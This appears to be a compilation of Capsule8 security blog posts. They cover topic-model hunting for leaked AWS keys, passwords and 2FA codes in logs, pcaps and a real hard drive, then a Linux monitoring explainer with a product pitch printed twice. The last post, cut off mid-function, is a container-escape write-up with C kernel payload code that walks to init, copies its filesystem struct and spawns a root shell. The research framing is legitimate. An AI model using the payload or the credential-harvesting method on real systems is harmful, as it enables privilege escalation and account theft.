Within Topic 2, the “aws” keyword has three data points we can investigate, which means the model identified “aws” as the primary keyword in three instances. It’s important to focus just on the relevant keywords for a specific topic, as there can be instances of the same keyword within other topics that are irrelevant (and are deemed as such by the model). For instance, there are 773 data points for “aws” within Topic 3, but it’s because “aws” appears in a URL path related to build commands, which isn’t relevant for our purposes.
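A sketch of this topic-then-keyword filtering, with hypothetical execsnoop-style lines (the real hunt ran over our actual dataset, and the lines below are invented for illustration):

```python
def keyword_hits(tagged_lines, topic_id, keyword):
    """Filter log lines by dominant topic first, then by keyword, so we only
    see instances the model deemed relevant (e.g. "aws" inside Topic 2),
    skipping irrelevant hits for the same keyword in other topics."""
    return [line for topic, line in tagged_lines
            if topic == topic_id and keyword in line.lower()]

# Hypothetical execsnoop-style lines, each tagged with its dominant topic:
tagged = [
    (2, "aws configure list"),
    (3, "curl https://build.internal/aws/artifact.tgz"),  # build-path noise
    (2, "git push origin main"),
    (2, "env AWS_SECRET_ACCESS_KEY=<redacted> aws s3 ls"),
]
```

keyword_hits(tagged, 2, "aws") returns only the two Topic 2 “aws” lines, ignoring the build-URL hit in Topic 3 — the same way the model let us skip the 773 irrelevant “aws” data points.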

Let’s take a look at these three data points for “aws” in Topic 2 to see if there’s anything that could help us:

Fantastically for us, the user made a heckin’ DevOops by using the wrong command, which leaked their AWS key. Now that we have their AWS access key, we could perform any actions we want in their AWS account (that are allowed by policy). We could use the key to launch EC2 instances for cryptomining or to access and exfiltrate sensitive customer data stored in S3 buckets — both of which represent a pretty big win for attackers. 

By using the power of topic models, we were able to quickly narrow down places to hunt based on relevant instances of the “aws” keyword. In fact, we didn’t even know we wanted the “aws” keyword (instead of a keyword like “password”) before we saw the topic the model generated — so it granted us a path previously unknown to us. This process helped us get to our goal in less than 30 minutes, rather than conducting an exhaustive manual search across the thousands of “aws” mentions within the entire dataset.

Case Study 2: Passwords in Captured TCP Traffic

Passwords are even harder for most red teams to discover as they sift through keylogs or syslogs, but using an LDA model helps with password discovery, too. Passwords could end up in a number of places or utilities, so they may be spread around multiple topics. For instance, on Linux, password input could occur frequently when using MySQL (mysql -u root --password), though passwords could also be pasted into bash by accident, too.

In the dataset from our first case study, any mistakenly pasted password into bash would be present in Topic 0 (Folders & Source control). If we want the mysql password, we would want to find the mysql keyword somewhere in one of the topics (which we didn’t have in our dataset). Thus, any red team’s starting point should be, “What topics are relevant for password leakage?” This helps you drill down into the right data, whether you’re seeking AWS keys or MySQL passwords.

To show the potency of the topic modeling approach, we will re-apply the LDA model to TCP dumps. We are operating as if we do not already know what the log contains, but have the mission to discover any passwords or credentials that could abet our malicious machinations. To test this out, we downloaded pcaps from the Mid-Atlantic CCDC, a competition testing students’ offense and defense skills. To our knowledge, all passwords and other information present in the data are not sensitive.

Let’s yeet ourselves right into the topic word clouds. The model found the number of optimal topics to be ten:

Topic 0 seems to be the most relevant to us, containing content related to login and authentication:

We can see the keyword “password” present in the top 30 list for Topic 0, so let’s dig deeper to see if we can find any passwords. As before, this is as simple as looking for a string containing pass within the topic:

We found them! They’re pretty simple passwords, probably because it’s for a student competition. However, whittling down 17 separate pcap files into topics for exploration and searching for the pass string within that topic saves a lot of manual effort rather than having to search through each file and hit matches for pass that may have the wrong context. Really, what is a valuable tool but something that facilitates laziness without reducing success?

Case Study 3: Passwords in a Windows HDD

We at Capsule8 enjoy a proper challenge, so we wanted to make the password discovery problem even harder for ourselves. For this final case study, let’s assume we gain direct access to our target’s hard drive, running Windows. We find a subdirectory that contains log files (an admittedly small sample of the entire dataset). Our goal now is to find passwords within it. As discussed in the two previous case studies, we’ll start by building an LDA model that learns the optimal number of topics, analyzing the topic clusters, and then seeing if any topics discernibly divulge the presence of passwords.

The model found five topics to be the optimal number. Because we used a real data set (i.e. a real, wild-caught HDD), we will only show the two topics relevant to our interests and with some sensitive keywords obfuscated:

The word cloud in Topic 3 exposes the keyword “password,” so we know the best starting point for our search. In fact, the model uncovered 162 passwords within Topic 3, which should make any attacker salivate: 

“Excelsior!” we cry out in furious joy, for we now hold the golden keys to paradise, where attackers can drape themselves on velvet chaises while languidly munching plump grapes by making the machines do all the thinky-thinky. But our brow furrows, imposter syndrome descending like a dark shroud, and the spark of ambition flares anew, curiosity pricking our neurons and leading to the harrowing question, “But what if there’s more?”

Looking back at the word clouds above, Topic 0 also looks promising with beguiling keywords such as “verification”, “verify”, “account”, and “code”. Our initial instinct was that this might contain 2FA codes, and the hunch was correct:

Note: we only are displaying a snippet of these 2FA codes for a popular chat app — there were 3,655 codes in Topic 0 uncovered by our model.

HDDs contain a ton of data — far more than is manageable for an analyst to comb through in a day. Using topic models, you can extract context from a huge volume of disparate data and divide it into manageable subsets for further analysis. In this last case study, these subsets included password information as well as verification codes — and this represents only a tiny fragment of the data on the HDD.


Using a bit of data magic, attackers can sift through large quantities of data to determine specific topics, identify promising keywords in those topics, and then analyze those keywords’ data points to see if juicy treasure lies within. Topic models help point you in the right direction to hunt for leaked credentials. And, the best part is that topic models only get better as the dataset increases in size, which makes it a lot easier (and hopefully more fun!) for attackers to find the data they need to advance their operations.

It would be natural and reasonable to think that perhaps we’ve overengineered this problem and that we are using fancy math for fancy math’s sake. Well, yes, but also no. Grepping is undeniably efficient if you already know what you seek and where to look for it. A key advantage topic models have over just grepping is that they will tell you about topics you weren’t aware of, which means you would never have known to search for them without the model’s guidance. 

Model training took just under 30 minutes for the first case study and only 15 minutes for the last one, but it could take more time with a larger dataset (like many days’ worth of daily system activity across many users). However, that represents a significant improvement over the amount of time it currently takes attackers to sift through keylogging data for the data they need. Let the model do the hard work of sifting through the data mountains to find the gilded path that leads to the cave of wonders within.

To explore our topic modeling tool yourself, check out our public Google Colab doc.

The Capsule8 Labs team conducts offense and defense research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage. 

How Capsule8 Approaches Linux Monitoring

Posted by

We at Capsule8 have put a lot of thought into our product, starting with a simple question: what would make us most mad as hackers if we encountered it while attacking an organization?

One difference between Capsule8 and other Linux detection solutions is that our detection happens locally. It’s far less expensive for everyone to do computations locally rather than shipping data off the machine over the network, and we like avoiding unnecessary pain. We also make Capsule8’s resource cost tunable, so you can set how much CPU time goes towards Capsule8 doing its thing. 

How you configure Capsule8 depends on your risk tolerance and your preference. This is how we’ve gotten the thumbs up from Ops, even at large enterprises. But what’s extra cool about Capsule8 is that we use kprobes + perf in an intelligent way, driven by our extensive experience breaking into systems. 

Think of it like this: if you want to know whether someone broke into your apartment, there are a few strategies you could create. The most obvious ones would be catching the window breaking, the doors being bashed in, or the safe with the jewels opening. This is where our exploitation expertise comes in handy (more on that below) because we look at what attackers must do to complete an attack. 

We maintain multiple vantage points, with an eye to the attacker’s “kill chain” — like looking at the front door, window, stairs, and closet door to the safe. You could also create a policy like: normally you hear the front door open before the window opens, so if you hear the window open before the front door, that’s weird. Think of this as the “check the context around the window opening” strategy.

Most ML, AI, and other mathematically-magical solutions are more like: “Let’s spend some time counting all the times the doors opened, and then send alerts on anything that deviates from this baseline we established.” Some go to an extreme and perform analysis that sounds cool, akin to asking, “Are the bricks moving? We should analyze the atomic states of the bricks in the building, maybe we should look at the chemical composition of the glass, too.”

For too many of these ML and AI-based solutions, they not only ignore how attackers actually behave, but also end up wasting a lot of network traffic and compute time. No one wants their time wasted, and the organization certainly doesn’t want its resources wasted.

At Capsule8, we also want to make attackers sad — hopefully crushing their souls. Ideally, you want to pinpoint exactly which points are interesting to attackers in the kernel and watch those closely. This is where a deep bench of exploitation experience (like our Capsule8 Labs team) comes in handy. That way, you know which places in the kernel are most loved by attackers, and can collect data that matters rather than collecting all the things.

For example, attackers love popping shells. But developers and programs love using bash and /bin/sh, too — it’s just a handy tool that everything uses. Most solutions will create a rule like, “show me anytime a shell runs,” which is going to be all the time. 

This sort of rule becomes functionally useless unless you absolutely love sifting through the same alert over and over. Capsule8 instead can determine the difference between a user and a program using it, and answer questions like, “Is this shell executing to routinely process a script, or is it interacting with a live user?” 

Capsule8’s approach means we can detect the entire spectrum of unwanted behavior on Linux, from devs risking production stability to sexy kernel exploitation by motivated attackers. This includes real zero-days — not zero-days as in “a slightly modified malware strain,” but the top-shelf expensive stuff that is exploiting the system in a way you can’t patch. 

If you want a cool recent example, check out our recent case study in detecting a compromise (specifically, a cryptominer) in our demo Kibana infrastructure. We also recommend checking out our Part 1 and Part 2 of how we exploited systemd (the first public exploit, I might add). The best part is, our stack pivot detection catches it — and that’s just one of the many detections we have in place. So it’s not about finding CVEs or anomalous behavior, it’s about finding the exact techniques attackers must use to compromise the system.

If you’re interested in learning more about how Capsule8 can protect your enterprise Linux infrastructure, request a demo.

A Guide to Linux Monitoring

Posted by

Different Approaches to Linux Host Monitoring

In case you hadn’t heard, Linux is a big deal. Linux servers are used in the vast majority of production systems, the ones running the apps and services everyone uses. But, as said by the great infosec #thoughtleader and uncle to Spiderman, “with great power comes great responsibility.” These servers need to be performant all the time — downtime isn’t considered cool these days.

Most organizations aren’t yet fully resilient, so a compromised system might even mean having to pull systems out and swap in new ones. And, there’s the annoying risk of bitcoin miners wanting your delicious computing power that vastly exceeds the systems in their basements.

You might think, “Well, we can just monitor Linux production servers and detect the attackers!” and basically everyone wishes it were that easy. This is not the case, however (at least in this Earth’s timeline). The most common approaches to monitoring Linux add components that cause chaos — kind of like adding dinosaurs to a theme park on an otherwise wild and beautiful tropical island. It may sound cool, but it’s likely to end poorly for everyone, except the dinosaurs — or in this case, the solution vendors who will gladly chomp up your dollars.

I’ll go through some of the approaches to monitoring Linux for production systems in a way that is digestible for folks learning about Linux monitoring for the first time and hopefully still fun for Linux nerds, too. Disclaimer: a lot of things will be really simplified, since the Linux Kernel is kind of like a pocket full of spaghetti with an extra heaping of nuance sauce required.

I’ll discuss any reservations DevOps has about the different monitoring approaches (hint: there is scar tissue around this topic for them) and general pros and cons of each method. We’ll go through a brief primer on the Linux kernel, then dive into AuditD, kernel modules, LD_PRELOAD, kprobes, ring buffers, perf, BPF/eBPF, and the role of ML/AI to explore the amazing world of Linux monitoring — and conclude with what kind of monitoring approach will get the thumbs up from both DevOps and SecOps.

The Linux Kernel

The kernel is like a super detailed gatekeeper. Similar to a bank teller, any program has to ask the kernel (teller) to do something on its behalf. Really the only thing for which a program doesn’t need the kernel’s assistance is arithmetic or raw computation — but use of hardware, like a graphics card, or other resources, like /etc/shadow (which stores password hashes), must be facilitated by the kernel.

Syscalls are the point at which a program transitions into the kernel. Think of them like the window at the bank under which you slide your request to the bank teller — you have to wait for a response to that request before anything happens. Syscalls can request anything from opening a file to giving the program more memory. Generally a more privileged entity — like the kernel — is the one that provides those things.
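To make the teller analogy concrete, here’s a minimal Python sketch (the file path is just an example); each os-level call below maps roughly one-to-one onto a syscall that a tool like strace would show you:

```python
import os
import tempfile

# Each os call below is one request "slid under the teller's window":
# a syscall the kernel must service on the program's behalf.
path = os.path.join(tempfile.gettempdir(), "syscall_demo.txt")

fd = os.open(path, os.O_CREAT | os.O_WRONLY | os.O_TRUNC, 0o600)  # open(2): ask for a handle
os.write(fd, b"hello, kernel")                                    # write(2): kernel moves our bytes
os.close(fd)                                                      # close(2): hand the handle back

fd = os.open(path, os.O_RDONLY)
data = os.read(fd, 64)                                            # read(2): wait for the reply
os.close(fd)
os.remove(path)                                                   # unlink(2)
```

Pure arithmetic in between those calls never touches the kernel, which is exactly the distinction drawn above.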

Some requests, however, will be a bit trickier, so the response won’t be immediate. Think of this like asking your bank teller, “Hey, can you give me a new bank account?” Your bank teller responds that they’ll have to collect a bunch of stuff to give to you. Likewise, for some requests, the kernel will tell the program to wait because it has to give it a bunch of stuff.

Thus, syscalls become an interesting point for inspection, because they are showing all the requests programs are making to the kernel. Basically every approach to Linux monitoring is either looking at syscalls or at other internal kernel functions for this reason — because you get better insight into the internal workings of the system.


AuditD

AuditD is a subsystem of the Linux kernel designed for monitoring access on Linux, writing as much audit info as possible to disk. All you probably need to know is that a core maintainer for syscall infrastructure on Linux hates AuditD and recommends staying away from it. But, here’s a very short explanation on why it’s so hated by the Ops community anyway.

The root cause of the issue is that AuditD conforms to a government standard that all events have to be auditable. So, you can’t have the ring buffer (more on that below) dropping anything — think of this like you can’t have any events leaking out of the information pipeline. In practice, this means that the whole system blocks processing until it’s confirmed that an auditable event was consumed. In some modes, this results in instability.

Another concerning issue is that AuditD’s log output is notoriously difficult to use and work into other systems. Unless you’re optimizing for the worst performance possible, this isn’t how to go about security observation on Linux.


LD_PRELOAD

Although it’s not frequently used, LD_PRELOAD is a way to monitor Linux while staying in userspace. The loader manages libraries — think of things like libc or pthread in Linux which programs use to do stuff. This means with LD_PRELOAD, you can leverage any sort of library you want and make sure it runs before the main program is loaded.

LD_PRELOAD says before the program starts, load all my code in there as a library. This approach provides a way of placing hooks inside the program without having a debugger attached — similar to the approach EMET uses on Windows. The thinking here is, “Okay, program, I know you go through these points to talk to the kernel, so I’ll set my hooks from the inside so I can see what you’re doing.”

As far as stability concerns go, if your hooking function isn’t well behaved, you’ll crash the program. The program expects memory and registers to be returned in a certain way, so if your hook doesn’t meet those expectations, the program will crash. In practice, you normally know the calling convention of the functions you want to hook with LD_PRELOAD, so it’s usually a safe thing to do and pretty fast, making it less of a risk than something like AuditD.

Another downside of LD_PRELOAD is that the visibility you get isn’t global and is instead process to process — because you can only see the processes you’ve hooked. As you try to make it more global, it becomes more fragile. This is because variations in library versions result in different symbols being exported — that is, data or instructions end up in a different place in memory from version to version. Finally, it doesn’t work with statically compiled binaries; static binaries don’t load other libraries, so you can’t preload your own library into them.

If you’re an attacker and clued into the fact that LD_PRELOAD is being used, you’ll be motivated to make the extra (but not difficult) effort to evade monitoring by performing syscalls directly. Even for programs linked to a particular library (like libc), it’s still possible to perform the syscall instruction (x86_64) or int 0x80 instruction (x86) directly. A preload-based monitor would completely miss events like those, and the last thing security people want is a big oof by missing easily-performed bypass maneuvers.

Kernel Modules

The original approach to monitoring activity on Linux was through kernel modules. With a kernel module, you add some code to the kernel that executes as part of the kernel and becomes as powerful as the rest of it — allowing you to do things like see all the syscalls coming in, plus any other capabilities you might want.

If this doesn’t sound safe, it’s because it isn’t! By adding code to the kernel, you’re adding attack surface that isn’t nearly as reviewed and tested as the base Linux kernel itself (which already has plenty of bugs on its own). Forcing custom C code into the kernel creates more code for attackers to exploit, although there are serious concerns beyond security for kernel modules as well. There are some workarounds, such as through Dynamic Kernel Module Support, but it requires recompiling — thereby requiring a compiler to be in production, which isn’t great ops hygiene.

If there were a Master Wizard of Linux gracing us with their sagely commandments, one would probably be “don’t break userland.” This means you shouldn’t change how all the programs on the system are written to talk to the kernel. While kernel maintainers adhere to this commandment to preserve outward-facing behavior of the kernel, the kernel itself thrives in a state of chaos all the time, so whatever kernel module you write risks not melding into the chaos and may instead cause a catastrophe. The kernel module is like a drama queen joining a carefully orchestrated fight scene — the likelihood that someone is going to get hurt shoots up.

Most Ops people understand the risks involved with using kernel modules, which engenders wariness. After all, the last thing you want is to crash the kernel on a production system — the likelihood of which can increase dramatically if a third-party kernel module is present. Ops teams also won’t be super jazzed at the fact that adding a kernel module often invalidates support contracts with their providers, like Red Hat. Think about it like jailbreaking your iPhone and getting Apple technical support.

Even worse, a kernel module means that every time a new kernel is deployed and updated, you have to recompile the kernel with the module. This adds manual labor and a layer of complexity that is a huge turn off for Ops teams. Ultimately, the risk tends to outweigh the reward with kernel modules.

Kprobe Events

But kernel modules aren’t the only way to collect data from the kernel. Linux provides tons of subsystems to help people collect data for performance and debugging. The Linux Kernel org specifically gave the community little mechanisms to use for visibility through the introduction of kprobes well over a decade ago. Basically, this was Linux saying, “Hey, we know you want to collect system data, so we’re going to make a standardized mechanism for you to do it.”

A kprobe is a means of saying, for a given function in the kernel, “I want to record when this function is called, and collect information such as the arguments it was passed.” The way it would be written on Linux using its special subsystem is like:

p:[name-for-probe-output] [function-you-want-to-probe] [what-will-it-collect]

For instance, it could be p:myexecprobe execve $ARG1, $ARG2. This would output the kprobe myexecprobe, which would include the programpath ($ARG1) and cmdline ($ARG2) when a user uses the execve syscall. You name your kprobe to tie any resulting output back to what you wanted to monitor. If you’re familiar with canarytokens, it’s similar to how you name a particular token, like MyPictures, so that when you receive the alert, you know the source of the alert is your MyPictures folder.
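On a system with tracefs available (paths vary by distro; root required), registering a probe like the one above looks roughly like this through the kernel’s kprobe_events interface. The probed symbol name and the argument-fetching syntax vary by kernel version and architecture (newer kernels route syscalls through wrappers like __x64_sys_execve), so treat this as a sketch rather than copy-paste-ready commands:

```shell
# Register a kprobe named myexecprobe on the execve handler, recording
# its first two arguments (symbol name and fetch syntax are kernel-
# version dependent).
echo 'p:myexecprobe sys_execve path=$arg1 argv=$arg2' \
    > /sys/kernel/debug/tracing/kprobe_events

# Enable the probe and watch events stream out of the trace buffer.
echo 1 > /sys/kernel/debug/tracing/events/kprobes/myexecprobe/enable
cat /sys/kernel/debug/tracing/trace_pipe

# Disable and remove the probe when done.
echo 0 > /sys/kernel/debug/tracing/events/kprobes/myexecprobe/enable
echo '-:myexecprobe' > /sys/kernel/debug/tracing/kprobe_events
```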

[Diagram: how kprobes work for Linux monitoring]

Most commonly, kprobes are placed on syscalls between specific processes (which run specific programs) and the kernel, as shown in the above diagram. There are also uprobes, which snoop on userspace functions instead of kernel functions, but they’re a topic for another time.

The output from kprobes is a super useful data source, but this output needs to be collected and analyzed. Unfortunately, most people still use a kernel module to handle the output from kprobes. This is still adding risk, which DevOps doesn’t (and shouldn’t) want. But, let’s continue to explore how they actually can be used more responsibly.

Ring Buffer

Ring buffers are also known as circular buffers. If you’re familiar with accounting, the ring buffer follows a FIFO approach. Or, you can think of it like an empty pizza pan where slices are added one by one and the next slice eaten is always the oldest slice added to the pan (because who wants to eat cold pizza?). Given the finite space within the ring buffer, when new data needs to be added, the oldest data will always be overwritten.

The reason ring buffers are used, rather than logging syscalls to disk, is that writing everything to disk would be expensive resource-wise and slow the system down. With the ring buffer, you ensure that the resource overhead stays the size of the pizza pan, rather than accumulating the equivalent of a ball pit full of pizza in your room.

I’ll be talking here about ring buffers for kprobes specifically. The first “block” (think: open space for that first slice of pizza on the pan) is the one that keeps track of the rest of the pan. This block will tell you where to begin reading and where to end reading based on what you’ve already read — that way you’re never missing anything.

So, what data is actually in these kprobe ring buffers? Let’s go back to our prior example of a kprobe of: p:myexecprobe execve $ARG1, $ARG2. These last two parameters, $ARG1 and $ARG2, define what myexecprobe will write to the ring buffer. In the case of execve, it might be the programpath and cmdline values. This is particularly helpful if you’re only looking to monitor specific sorts of metadata for particular functions — that way you get exactly what you need (arguments, return values, etc.).

For monitoring, you need something fast so you catch any bad activity quickly. You want to copy things as little as possible for performance, and mmap, which is short for memory mapping, can help with that.

Think of using mmap like cutting out a middleperson. Let’s say there’s a factory that is bulk producing a variety of widgets that get packaged and shipped out. Rather than waiting to receive one of those packages, having to unpackage it, and then finally being able to see what the widget is, wouldn’t it save more time getting a window into the factory to see the widget? Mmap provides that sort of window, allowing you to specify the window of how many widgets you can see, saving you a lot of time.

To recap, kprobe ring buffers allow you to efficiently output the data you defined wanting from your kprobes, and mmap makes the process of accessing that data even more efficient.


Perf

About a decade ago, the Linux kernel introduced a new mechanism, called perf, to help extract data collected via sources like kprobes. As you might imagine, perf is short for performance, because its original use case was performance analysis on Linux. Perf collects the data from kprobes and puts it into the ring buffer. Let’s say Apache performs a syscall on which you have a kprobe; perf then says, “Okay, collect this data based on the kprobe’s specifications, and we’ll write the data for you here in this buffer.”

The great news is that perf grants you access to kprobes, but in a much safer way than kernel modules. Using perf is extremely stable, in contrast to the instability and chaos of using kprobes from a kernel module. Simply put, by using perf, you’re a lot less likely to mess anything up in the kernel. Really the biggest downside of perf is that it doesn’t backport well to ancient kernels — think the Linux equivalent of Windows XP. For more on how perf can be used, see Brendan Gregg’s excellent write-up.


BPF and eBPF

BPF (Berkeley Packet Filter) programs are essentially itty bitty programs. BPF takes baby rules like source_ip = X.X.X.X and translates them into a tiny program. Because BPF is its own baby instruction set, it can only do simple things, like basic arithmetic. It can jump forwards, but not backwards, so no loops for these little ones. All access to data is validated to be safe by the kernel. These restrictions bound the runtime of BPF programs and ensure all resource access is provably safe, meaning you can run custom BPF programs in the kernel without risking stability.

eBPF is extended BPF. eBPF is a means of loading tiny programs into the kernel to execute during certain events. For instance, you could set little programs to evaluate data you collected through your kprobe.

By far the biggest downside of BPF and eBPF is limited backwards compatibility. The ability to attach eBPF to kprobes only exists in kernels from the past five years — and, as most Ops people know, a good chunk of enterprises run kernels way older than that. Therefore, while it might be the method of the future, it lacks support for the reality of most organizations’ environments today.

For more about how all the aforementioned mechanisms work together, I highly recommend Julia Evans’ blog and infographic on Linux tracing.

ML, AI, & Unicorn Dust

In addition to using the drama queen kernel modules, some solutions will go really heavy-handed with machine learning and artificial intelligence in order to improve their monitoring and detection. Regrettably, despite the cool math, there’s a significant training period upfront and a lot of tuning required.

DevOps doesn’t want a heavy footprint, however — not on the network, and certainly not on the CPU. But for most of these AI and ML-driven solutions, the architecture generally doesn’t scale well. These solutions collect data points all the time and send them over the network, which makes the network really sad and tired. It’d be like UPS having to deliver all Christmas presents on one day — the streets would be clogged, front steps and hallways would be packed, and drivers would be absolutely miserable.

Looking for anomalous behavior across the entire syscall boundary can give a sense of whether an app is acting weird, but not really if it’s acting weird for a security reason. This means a lot of false positives, which is obviously a big thumbs down for SecOps.

Batch analysis is generally required for solutions heavy in machine learning or artificial intelligence, which also means real-time monitoring isn’t possible. Real-time, despite being an overused buzzword, actually does matter to SecOps, because it’s better to catch exploitation as it’s happening than reading your alerts only to find a compromise that’s already occurred.

The reason batch analysis isn’t real time is that the mountain of data must be collected, sent out over the network, and analyzed for policy violations or anomalies, and only then is an alert generated, minutes or even hours later. If you don’t put a lot of money into a machine collecting all the data in one place and performing analysis, it can take even longer. This kind of computing is super expensive — and businesses tend not to like expensive things, particularly for areas like security that are already perceived as “cost centers.”

Another issue for machine learning-led approaches is that the algorithms have to learn from training data. The problem is that in order for the algorithm to catch an attack, it needs to have seen it before to identify it — which is not a solid bet when relying on historical data for training. Machine learning can be useful at catching some basic stuff at scale, but it will always be linked to the past, and worse at catching novel or sneakier exploitation.

The Capsule8 Way

This is where I show us off a bit — you are more than welcome to skip to the conclusion, but you’ll miss out on some pretty awesome stuff! We’ve put a lot of thought into our product by thinking about what would make us most mad as hackers if we encountered it while attacking an organization.

One difference between Capsule8 and other Linux detection solutions is that our detection happens locally. It’s far less expensive for everyone to do computations locally than to ship data off the machine over the network, and we like avoiding unnecessary pain. We also make Capsule8’s resource cost tunable, so you can set how much CPU time goes towards Capsule8 doing its thing.

How you configure Capsule8 depends on your risk tolerance and your preference. This is how we’ve gotten the thumbs up from Ops, even at large enterprises. But what’s extra cool about Capsule8 is that we use kprobes + perf in an intelligent way, driven by our extensive experience breaking into systems.

Think of it like this: if you want to know whether someone broke into your apartment, there are a few strategies you could create. The most obvious ones would be catching the window breaking, the doors being bashed in, or the safe with the jewels opening. This is where our exploitation expertise comes in handy (more on that below) because we look at what attackers must do to complete an attack.

We maintain multiple vantage points, with an eye to the attacker’s “kill chain” — like looking at the front door, window, stairs, and closet door to the safe. You could also create a policy like: normally you hear the front door open before the window opens, so if you hear the window open before the front door, that’s weird. Think of this as the “check the context around the window opening” strategy.

Most ML, AI, and other mathematically-magical solutions are more like: “Let’s spend some time counting all the times the doors opened, and then send alerts on anything that deviates from this baseline we established.” Some go to an extreme and perform analysis that sounds cool, akin to asking, “Are the bricks moving? We should analyze the atomic states of the bricks in the building, maybe we should look at the chemical composition of the glass, too.”

For too many of these ML and AI-based solutions, they not only ignore how attackers actually behave, but also end up wasting a lot of network traffic and compute time. No one wants their time wasted, and the organization certainly doesn’t want its resources wasted.

At Capsule8, we also want to make attackers sad — hopefully crushing their souls. Ideally, you want to pinpoint exactly which points are interesting to attackers in the kernel and watch those closely. This is where a deep bench of exploitation experience (like our Capsule8 Labs team) comes in handy. That way, you know which places in the kernel are most loved by attackers, and can collect data that matters rather than collecting all the things.

For example, attackers love popping shells. But developers and programs love using bash or bin shells, too — it’s just a handy tool that everything uses. Most solutions will create a rule like, “show me anytime a shell runs,” which is going to be all the time.

This sort of rule becomes functionally useless unless you absolutely love sifting through the same alert over and over. Capsule8 instead can determine the difference between a user and a program using it, and answer questions like, “Is this shell executing to routinely process a script, or is it interacting with a live user?”

Capsule8’s approach means we can detect the entire spectrum of unwanted behavior on Linux, from devs risking production stability to sexy kernel exploitation by motivated attackers. This includes real zero-days — not zero-days as in “a slightly modified malware strain,” but the top-shelf expensive stuff that is exploiting the system in a way you can’t patch.

If you want a cool recent example, check out our Part 1 and Part 2 of how we exploited systemd (the first public exploit, I might add). The best part is, our stack pivot detection catches it — and that’s just one of the many detections we have in place. So it’s not about finding CVEs or anomalous behavior, it’s about finding the exact techniques attackers must use to compromise the system.


IT Ops, DevOps, InfraOps, and other *Ops people hate kernel modules because they:

  • Create instability
  • Invalidate support contracts
  • Require re-compiling kernel updates with the module
  • For real, they require compilers on prod instances :scream:
  • Make you wait to rebuild the kernel if there’s a critical vuln
  • Totally break the build chain people use
  • (but at least it isn’t AuditD?)

A kprobe + perf approach is the safer way to perform Linux monitoring, even for ancient systems that are probably covered in moss like Ancient Guardians in Zelda at this point — but still happily running along despite their age. Keep an eye out on BPF and eBPF, but keep in mind that until the vast majority of enterprises move beyond those ancient kernels, they aren’t for widespread usage.

Ultimately, if you don’t want to make DevOps miserable, you need Linux monitoring that:

  • Can’t crash the kernel
  • Won’t flood the network
  • Won’t require extra labor by Ops
  • Fits into the existing build chain
  • No, seriously, it really can’t disrupt prod

If you’re SecOps or DevSecOps, you’ll probably be happy if:

  • Real attacks are detected
  • Even better, real attacks are prevented
  • You aren’t spammed with alerts
  • Your time isn’t wasted with false positives
  • You aren’t drowning in a data swamp
  • You can control analysis costs
  • Ops isn’t telling you your monitoring idea is bad, and that you should feel bad

Obviously, this is Capsule8’s mission — for security and operations to live in harmony, while making attackers mad that they can’t compromise your production Linux systems.

An Exercise in Practical Container Escapology

Posted by

You Think That’s Air You’re Breathing?


Containerization has revolutionized how software is developed and deployed, by providing powerful specificity and control for devs and ops alike. By isolating software environments and interactions, containers categorically eliminate a variety of problems which have historically plagued the software development process, such as dependency conflicts and name collisions. Containers also provide some security properties, including version management, an expression of intent, and often reduced attack surface. However, it is important to understand that although the organizational isolation of containers is what enables these security properties, isolation itself is not a security property of containers.

As the use of containers in production Linux environments continues to increase, so does the interest in how the technology responsible for containers can be used and abused to break free from the confines of a container. Recently there was a fair amount of hype surrounding the vulnerability in runc, and for good reason: getting out of the container gives the attacker much broader access to a host, enabling interaction with other containers, and the ability to view and modify configurations. But what seemed lost in this hype is that the ability to escape containers is not confined to a one-off vulnerability in container management programs or orchestrators.

Simply put, containers are just processes, and as such they are governed by the kernel like any other process. Thus any kernel-land vulnerability which yields arbitrary code execution can be exploited to escape a container. To demonstrate this, Capsule8 Labs has created an exploit that removes the process from its confines and gives it root access in the Real World. Let’s take a look at what was involved.


Like most (but not all!) privilege escalation exploits that target Linux, the first thing we need is a kernel vulnerability. These are found and patched on a regular basis, and from time to time, a proof of concept exploit is released that demonstrates the impact of the issue. For the purposes of this post, we are going to use a combination of two vulnerabilities that were discovered and exploited by Andrey Konovalov, a Googler who regularly shares vulnerabilities he finds, along with exploit code. Thanks, Andrey! We use the first vulnerability as our ASLR bypass, as the method included in the second PoC exploit is unreliable if the target system has a high uptime.

We selected these two vulnerabilities as an example of a scenario where SMEP/SMAP can be disabled, and subsequently the kernel can be made to execute user-controlled code from a userland process (which is effectively like having shellcode that can be written in C). A full write-up on the mechanism used by these exploits to get us to this point of the kernel executing userland code is beyond the scope of this post. The purpose of this post is to describe how once any given kernel exploit reaches this point, a payload can be applied to escape a container.

Relevant Structures

In reality, very little separates a process from being in or out of a container. Furthermore, you don’t need to play with namespaces in order to escape the container’s confines and interact with the host. It can come down to as little as interacting with the following data structures:


task_struct

This struct is the guts of a process in the kernel, and it holds a few things we care about:

  • pid: the pid number of the task, which in kernel-land is better thought of as a user-land thread ID
  • real_parent: a pointer to the task_struct of the parent task. We loop over this pointer and interrogate the parent’s pid in order to find PID 1 – the PID belonging to init.
  • fs: a pointer to the task’s fs_struct, which describes the filesystem where the task is operating


fs_struct

This defines the root directory and present working directory for the task. We can copy this over from another process that is not in a container in order to have our task point at a directory in the host file system. By copying init‘s fs_struct, we can be sure to land in the root directory of the host. To do this, we call the copy_fs_struct kernel function, as it appropriately handles the accounting work of locking and updating the reference count to the underlying members of the fs_struct.

Breaking out

When it comes to actually breaking out, a few things need to happen. We need to:

  1. Escalate to root – Set the credentials of our task to that of root – ensuring we are actually root once we break out.
  2. Find init – Find the task_struct for PID 1, the init process – we want to copy a lot of its data to our own task.
  3. Copy filesystem info – Copy the fs_struct information from init‘s structs to ours
  4. Execute a root shell – Execute /bin/bash to drop us into a root shell.

Of the four steps above, 2 and 3 are specific to our container escape exploit. The crux of our changes is shown below. We have added one function named get_task(), which gets the value of current (a pointer to our task’s task_struct); the rest of the code follows the original exploit, available here.

typedef unsigned long __attribute__((regparm(3))) (*_copy_fs_struct)(unsigned long init_task);

uint64_t get_task(void) {
    uint64_t task;
    /* Read the current task_struct pointer from the per-CPU area; the
       offset is specific to this kernel build. */
    asm volatile ("movq %%gs:0xD380, %0":"=r"(task));
    return task;
}

void get_root(void) {
    char *task;
    char *init;
    uint32_t pid = 0;

    /* Walk up the process lineage via real_parent until we reach
       init (PID 1). */
    task = (char *)get_task();
    init = task;
    while (pid != 1) {
        init = *(char **)(init + TASK_REAL_PARENT_OFFSET);
        pid = *(uint32_t *)(init + TASK_PID_OFFSET);
    }

    /* Copy init's fs_struct into our task so our root directory and cwd
       land in the host filesystem. */
